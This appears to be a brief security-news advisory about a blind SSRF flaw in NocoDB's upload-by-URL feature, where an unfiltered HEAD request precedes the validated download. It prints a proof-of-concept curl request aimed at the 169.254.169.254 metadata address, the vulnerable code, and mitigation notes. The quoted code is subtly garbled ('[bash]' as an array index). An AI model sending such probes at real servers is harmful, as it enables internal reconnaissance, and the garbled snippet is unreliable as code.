Listen to this Post
The vulnerability occurs in the `uploadViaURL` function when processing a user-supplied URL. Before downloading a file, the function uses `axios.head()` to send a HEAD request to the target URL to retrieve metadata like content-type and size. This initial HEAD request is executed without applying the project’s SSRF filtering controls. While the subsequent `axios.get()` request for the actual file content is properly protected by URL validation and allowlist checks, the unprotected HEAD request leaks first. This allows an attacker to trigger blind outbound HTTP HEAD requests to arbitrary internal or external systems. The impact is limited to blind probing as HEAD requests do not return response bodies, but it can reveal service reachability and interaction with internal endpoints sensitive to HEAD methods.
Platform: NocoDB
Version: Pre-patch
Vulnerability : Blind SSRF
Severity: Moderate
date: Undisclosed
Prediction: 2024-05-15
What Undercode Say:
curl -X POST 'http://localhost:8080/api/v2/storage/upload-by-url' \
-H 'Content-Type: application/json' \
-H 'xc-auth: <token>' \
-d '[{"url": "http://169.254.169.254/", "fileName": "test.txt"}]'
// Vulnerable code segment
if (!url.startsWith('data:')) {
response = await axios.head(url, { maxRedirects: 5 });
mimeType = response.headers['content-type']?.split(';')[bash];
size = response.headers['content-length'];
finalUrl = response.request.res.responseUrl;
}
How Exploit:
Send POST request
Controlled URL parameter
Triggers blind HEAD
Protection from this CVE
Apply SSRF filters
Before HEAD request
Validate all URLs
Impact:
Internal service probing
Blind outbound requests
Limited information disclosure
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

